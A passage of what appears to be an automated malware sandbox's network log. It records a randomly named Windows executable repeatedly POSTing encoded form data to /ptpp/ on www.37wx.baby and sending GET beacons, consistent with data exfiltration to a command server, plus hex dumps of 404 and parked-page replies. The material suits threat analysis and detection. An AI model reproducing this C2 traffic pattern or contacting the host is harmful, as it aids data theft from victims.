<meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la página de:</p> <h1>www.le-pier.online</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTR [TRUNCATED]
Oct 10, 2024 14:13:46.297065020 CEST	1236	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 43 4f 4d 45 4e 54 41 52 49 4f 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 Data Ascii: ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div
Oct 10, 2024 14:13:46.297075033 CEST	1236	IN	Data Raw: 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 72 72 65 6f 22 20 74 69 74 6c 65 3d 22 43 6f 72 72 65 6f 20 70 72 6f 66 65 73 69 6f 6e Data Ascii: ource=parking&utm_medium=link&utm_campaign=correo" title="Correo profesional">correo profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2>
Oct 10, 2024 14:13:46.297085047 CEST	672	IN	Data Raw: 65 20 66 6f 72 6d 61 20 73 65 6e 63 69 6c 6c 61 20 63 6f 6e 20 6c 61 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 72 73 79 73 2e 65 73 2f 63 72 65 61 72 2f 74 69 65 6e 64 61 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b Data Ascii: e forma sencilla con la <a href="https://www.arsys.es/crear/tienda?utm_source=parking&utm_medium=link&utm_campaign=tiendas" title="Tienda Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posici
Oct 10, 2024 14:13:46.297094107 CEST	1236	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 72 73 79 73 2e 65 73 2f 68 65 72 72 61 6d 69 65 6e 74 61 73 2f 73 6d 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 Data Ascii: ="https://www.arsys.es/herramientas/sms?utm_source=parking&utm_medium=link&utm_campaign=sms" title="Web SMS">web sms</a>.</p> </article>--> <article> <h2>Cloud Backup</h2> <p>El mejor servici
Oct 10, 2024 14:13:46.297102928 CEST	1236	IN	Data Raw: 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 65 72 76 69 64 6f 72 20 43 6c 6f 75 64 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: </article> <article> <h2>Servidor Cloud</h2> <p>Flexibilidad, potencia y seguridad en tu <a href="https://www.arsys.es/servidores/cloud?utm_source=parking&utm_medium=link&utm_campaign=cloud" title="
Oct 10, 2024 14:13:46.297112942 CEST	1233	IN	Data Raw: 72 74 6e 65 72 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 74 6e 65 72 73 22 20 74 69 74 6c 65 3d 22 50 72 Data Ascii: rtners?utm_source=parking&utm_medium=link&utm_campaign=partners" title="Programa de Partners">programa de partners</a> podrs conseguir descuentos y comisiones.</p> </article> </div></section><footer><a href="https:/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50015	209.146.101.85	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:51.714476109 CEST	774	OUT	POST /ptpp/ HTTP/1.1 Host: www.37wx.baby Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.37wx.baby Referer: http://www.37wx.baby/ptpp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 6f 67 4a 52 4c 35 35 36 57 74 57 31 69 4b 41 66 5a 38 61 31 32 6e 4c 35 74 59 50 69 65 41 41 79 36 76 51 4d 6c 74 75 6a 43 42 5a 4b 77 2b 50 79 76 72 7a 43 61 31 50 37 66 42 7a 64 74 68 54 2b 4d 6d 71 2b 71 37 6e 4f 4e 7a 37 4f 71 38 74 5a 6b 31 66 68 43 72 61 6a 4d 46 68 72 34 6e 45 44 4b 6d 49 55 34 5a 50 54 59 49 4c 72 77 77 51 52 48 62 4f 6e 44 33 36 66 4d 6c 70 6e 48 41 35 6b 73 75 75 66 38 58 53 69 41 5a 31 6b 48 4d 6f 62 39 72 47 6e 41 71 52 78 55 69 33 66 52 43 32 50 65 5a 53 55 31 66 4f 30 56 4e 49 6d 75 30 4b 4d 57 4b 61 37 36 44 74 76 52 38 72 4f 6b 55 55 56 52 77 3d 3d Data Ascii: DX3L=ogJRL556WtW1iKAfZ8a12nL5tYPieAAy6vQMltujCBZKw+PyvrzCa1P7fBzdthT+Mmq+q7nONz7Oq8tZk1fhCrajMFhr4nEDKmIU4ZPTYILrwwQRHbOnD36fMlpnHA5ksuuf8XSiAZ1kHMob9rGnAqRxUi3fRC2PeZSU1fO0VNImu0KMWKa76DtvR8rOkUUVRw==
Oct 10, 2024 14:13:52.274084091 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty/1.15.8.1 Date: Thu, 10 Oct 2024 12:13:52 GMT Content-Type: text/html Content-Length: 2842 Connection: close ETag: "663736a8-b1a" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <title>404 - phpstudy</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="format-detection" content="telephone=no"> <meta HTTP-EQUIV="pragma" CONTENT="no-cache"> <meta HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate"> <meta HTTP-EQUIV="expires" CONTENT="Wed, 26 Feb 1997 08:21:57 GMT"> <meta HTTP-EQUIV="expires" CONTENT="0"> <style> body{ font: 16px arial,'Microsoft Yahei','Hiragino Sans GB',sans-serif; } h1{ margin: 0; color:#3a87ad; font-size: 26px; } .content{ [TRUNCATED]
Oct 10, 2024 14:13:52.274111986 CEST	1236	IN	Data Raw: 20 20 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 3e 64 69 76 7b 0d 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0d 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 Data Ascii: } .content >div{ margin-top: 50px; padding: 20px; background: #d9edf7; border-radius: 12px; } .content dl{ color: #2d6a88; line-height: 40px; } .content div div {
Oct 10, 2024 14:13:52.274126053 CEST	549	IN	Data Raw: e5 8a 9e e6 b3 95 ef bc 9a 3c 2f 64 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 64 3e e5 b0 86 e7 bd 91 e7 ab 99 e5 ba 94 e7 94 a8 e7 a8 8b e5 ba 8f e5 a4 8d e5 88 b6 e5 88 b0 e7 ab 99 e7 82 b9 e7 9b ae e5 bd 95 e4 b8 ad ef bc 8c e6 88 96 e8 Data Ascii: </dd> <dd></dd> <dt>6</dt> <dd></dd> <dd>
Oct 10, 2024 14:13:52.599596977 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty/1.15.8.1 Date: Thu, 10 Oct 2024 12:13:52 GMT Content-Type: text/html Content-Length: 2842 Connection: close ETag: "663736a8-b1a" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <title>404 - phpstudy</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="format-detection" content="telephone=no"> <meta HTTP-EQUIV="pragma" CONTENT="no-cache"> <meta HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate"> <meta HTTP-EQUIV="expires" CONTENT="Wed, 26 Feb 1997 08:21:57 GMT"> <meta HTTP-EQUIV="expires" CONTENT="0"> <style> body{ font: 16px arial,'Microsoft Yahei','Hiragino Sans GB',sans-serif; } h1{ margin: 0; color:#3a87ad; font-size: 26px; } .content{ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50016	209.146.101.85	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:54.273096085 CEST	794	OUT	POST /ptpp/ HTTP/1.1 Host: www.37wx.baby Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.37wx.baby Referer: http://www.37wx.baby/ptpp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 6f 67 4a 52 4c 35 35 36 57 74 57 31 69 70 59 66 56 37 75 31 77 48 4c 36 78 6f 50 69 58 67 41 2b 36 76 73 4d 6c 70 32 4a 44 7a 4e 4b 78 66 2f 79 73 76 76 43 5a 31 50 37 52 68 7a 63 67 42 54 68 4d 6d 32 32 71 2b 6e 4f 4e 31 58 4f 71 2b 31 5a 6a 47 33 6d 43 37 61 68 41 6c 68 31 31 48 45 44 4b 6d 49 55 34 5a 62 31 59 49 44 72 73 51 41 52 47 36 4f 6f 4b 58 36 63 4e 6c 70 6e 44 41 35 65 73 75 75 39 38 56 32 45 41 62 4e 6b 48 4f 77 62 7a 5a 69 6f 4a 71 52 33 61 43 32 37 52 52 44 2f 63 72 66 39 79 4d 4f 61 51 4d 6b 57 69 53 62 57 48 37 37 73 6f 44 4a 63 4d 37 69 36 70 58 70 63 4b 2b 77 66 67 39 4d 4b 71 4d 30 51 76 46 4b 78 4a 39 54 75 4e 37 55 3d Data Ascii: DX3L=ogJRL556WtW1ipYfV7u1wHL6xoPiXgA+6vsMlp2JDzNKxf/ysvvCZ1P7RhzcgBThMm22q+nON1XOq+1ZjG3mC7ahAlh11HEDKmIU4Zb1YIDrsQARG6OoKX6cNlpnDA5esuu98V2EAbNkHOwbzZioJqR3aC27RRD/crf9yMOaQMkWiSbWH77soDJcM7i6pXpcK+wfg9MKqM0QvFKxJ9TuN7U=
Oct 10, 2024 14:13:54.867892981 CEST	179	IN	HTTP/1.1 404 Not Found Server: openresty/1.15.8.1 Date: Thu, 10 Oct 2024 12:13:54 GMT Content-Type: text/html Content-Length: 2842 Connection: close ETag: "663736a8-b1a"
Oct 10, 2024 14:13:54.867925882 CEST	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <title>404 - phpstudy</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="renderer" content="webkit"> <meta htt
Oct 10, 2024 14:13:54.867957115 CEST	1236	IN	Data Raw: 38 38 3b 0d 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0d 0a 20 20 20 20 7d 20 0d 0a 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 64 69 76 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f Data Ascii: 88; line-height: 40px; } .content div div { padding-bottom: 20px; text-align:center; } </style></head><body> <div class="content"> <div> <h1>404 - Page Not Found </h1>
Oct 10, 2024 14:13:54.867970943 CEST	370	IN	Data Raw: ba 86 e4 bc aa e9 9d 99 e6 80 81 3c 2f 64 74 3e 0d 0a 09 09 20 20 3c 64 64 3e e8 a7 a3 e5 86 b3 e5 8a 9e e6 b3 95 ef bc 9a 3c 2f 64 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 64 3e e5 b0 86 e4 bc aa e9 9d 99 e6 80 81 e8 a7 84 e5 88 99 e5 88 Data Ascii: </dt> <dd></dd> <dd></dd> </dl> <div>BUG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50017	209.146.101.85	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:56.813620090 CEST	10876	OUT	POST /ptpp/ HTTP/1.1 Host: www.37wx.baby Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.37wx.baby Referer: http://www.37wx.baby/ptpp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 6f 67 4a 52 4c 35 35 36 57 74 57 31 69 70 59 66 56 37 75 31 77 48 4c 36 78 6f 50 69 58 67 41 2b 36 76 73 4d 6c 70 32 4a 44 7a 56 4b 77 74 33 79 76 49 62 43 59 31 50 37 5a 42 7a 42 67 42 54 73 4d 6d 2b 79 71 2b 61 37 4e 32 6a 4f 6f 66 56 5a 6d 7a 44 6d 52 62 61 68 49 46 68 30 34 6e 46 65 4b 6d 59 4c 34 61 6a 31 59 49 44 72 73 53 6f 52 46 72 4f 6f 4d 58 36 66 4d 6c 70 72 48 41 34 51 73 71 4c 43 38 56 69 79 42 71 74 6b 48 75 67 62 78 72 36 6f 47 71 52 31 64 43 32 6a 52 52 66 67 63 72 7a 58 79 50 53 77 51 50 34 57 69 54 2f 42 41 50 37 4f 32 67 68 41 61 4c 47 39 79 6b 64 44 4e 65 55 69 76 74 30 43 70 75 41 66 67 6d 69 2b 54 2b 53 30 53 38 46 4d 7a 2f 2f 32 35 61 52 6b 6f 57 51 57 48 65 6d 58 53 2b 6b 54 5a 4d 77 54 75 4b 39 53 70 41 78 30 34 47 6a 46 6c 37 62 43 71 34 46 37 34 67 71 65 68 41 72 74 6f 34 39 51 57 39 56 43 54 6a 34 44 48 48 2f 71 32 62 62 47 65 2f 72 74 52 55 42 61 48 31 78 79 66 50 32 75 72 38 5a 6f 47 76 4e 6f 6d 37 56 37 6f 63 32 44 42 67 2b 48 67 55 49 47 79 2b 37 76 44 [TRUNCATED] Data Ascii: DX3L=ogJRL556WtW1ipYfV7u1wHL6xoPiXgA+6vsMlp2JDzVKwt3yvIbCY1P7ZBzBgBTsMm+yq+a7N2jOofVZmzDmRbahIFh04nFeKmYL4aj1YIDrsSoRFrOoMX6fMlprHA4QsqLC8ViyBqtkHugbxr6oGqR1dC2jRRfgcrzXyPSwQP4WiT/BAP7O2ghAaLG9ykdDNeUivt0CpuAfgmi+T+S0S8FMz//25aRkoWQWHemXS+kTZMwTuK9SpAx04GjFl7bCq4F74gqehArto49QW9VCTj4DHH/q2bbGe/rtRUBaH1xyfP2ur8ZoGvNom7V7oc2DBg+HgUIGy+7vDvjEBL+f1YA8w1/MvxI7LH6wDTcODBx2GExZmbPNg/MMf2sgjiQRasDYMrTeFynb/IilWKBBk8aJSpGPh8tgS29NqVXBix1NZTVU/wTi/FrZzQ+4Gqeww0Ilo1VT0xM/9OmV1oFqDw8+C4rIlc44JntzsKY0UrqchOtHR2OIy+OZlNY6lSfkMCbPkdpIW6iuUYEBXQANbgrrcNhFSb1cDdcpkHE34MeyRIJRguVCy/fRrf2iZJOeclXeztD2bZhiEE1y+wkzB+n1A33BD7AVy2LL+EaBBFkNZLt17Gm9Cqkwy4kfpu0o9Rky6HyGbe/WvFtFip8I+inbQbG/kp509xbLEFQJmUhwBuEW+OVoFl0oKUTG1GX5FA7DWs++mlZgw4t30+4kqEI3lO7ydMbffu6lUuWzE8C4aPI8+bcOOijmQysHpdNR0GKwZOp9XRkUfNDCsdHvdqFzkyVFbvS9nZNSy62vOL5tYP0aeYo5/rb14Wu9fd3HvOjtERVYVZ23KsJDJf5e0kZPuTs61binY0pc89O4lUcGQZj8bsTrqj0p8tYu69YlYVlxXydyOXFO8nTcOO2LP9h1OUqOgVf3ELFx6pWGj0Avl+EBkchRhftydVuK5pjCpJurszcvOjvSR5hB5vXVJX0OiqEt/lviKc9oY6Vi616DDDa [TRUNCATED]
Oct 10, 2024 14:13:57.393333912 CEST	179	IN	HTTP/1.1 404 Not Found Server: openresty/1.15.8.1 Date: Thu, 10 Oct 2024 12:13:57 GMT Content-Type: text/html Content-Length: 2842 Connection: close ETag: "663736a8-b1a"
Oct 10, 2024 14:13:57.393493891 CEST	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <title>404 - phpstudy</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="renderer" content="webkit"> <meta htt
Oct 10, 2024 14:13:57.393508911 CEST	224	IN	Data Raw: 38 38 3b 0d 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0d 0a 20 20 20 20 7d 20 0d 0a 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 64 69 76 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f Data Ascii: 88; line-height: 40px; } .content div div { padding-bottom: 20px; text-align:center; } </style></head><body> <div class="content"> <div> <h1>404 - Page Not Fo
Oct 10, 2024 14:13:57.460988998 CEST	1236	IN	Data Raw: 75 6e 64 20 e6 9c aa e6 89 be e5 88 b0 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 74 3e e9 94 99 e8 af af e8 af b4 e6 98 8e ef bc 9a e8 af b7 e6 b1 82 e7 9a 84 e9 a1 b5 e9 9d a2 e4 b8 8d e5 Data Ascii: und </h1> <dl> <dt></dt> <dt>1,</dt> <dd></dd> <dd>
Oct 10, 2024 14:13:57.461230040 CEST	146	IN	Data Raw: bc 8c 42 55 47 e5 8f 8d e9 a6 88 ef bc 8c e5 ae 98 e7 bd 91 e5 9c b0 e5 9d 80 ef bc 9a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 78 70 2e 63 6e 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 77 77 77 2e 78 70 2e Data Ascii: BUG <a href="https://www.xp.cn" target="_blank">www.xp.cn</a> </div> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50018	209.146.101.85	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:13:59.356589079 CEST	512	OUT	GET /ptpp/?DX3L=lihxIN19PO2foZESUJiQ3jjEy7fYejBWrNgJsJ+GMwRxuOrK8IfyZznUQBbQ3AvnNmKJlNWcNUn8sc5ShkrmAdK6H0xx+zYVCkBQ46T9I5md+kA4CLmwBFE=&GHcxP=10HpjR HTTP/1.1 Host: www.37wx.baby Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:13:59.930274010 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty/1.15.8.1 Date: Thu, 10 Oct 2024 12:13:59 GMT Content-Type: text/html Content-Length: 2842 Connection: close ETag: "663736a8-b1a" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <title>404 - phpstudy</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="format-detection" content="telephone=no"> <meta HTTP-EQUIV="pragma" CONTENT="no-cache"> <meta HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate"> <meta HTTP-EQUIV="expires" CONTENT="Wed, 26 Feb 1997 08:21:57 GMT"> <meta HTTP-EQUIV="expires" CONTENT="0"> <style> body{ font: 16px arial,'Microsoft Yahei','Hiragino Sans GB',sans-serif; } h1{ margin: 0; color:#3a87ad; font-size: 26px; } .content{ [TRUNCATED]
Oct 10, 2024 14:13:59.930354118 CEST	403	IN	Data Raw: 20 20 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 3e 64 69 76 7b 0d 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0d 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 Data Ascii: } .content >div{ margin-top: 50px; padding: 20px; background: #d9edf7; border-radius: 12px; } .content dl{ color: #2d6a88; line-height: 40px; } .content div div {
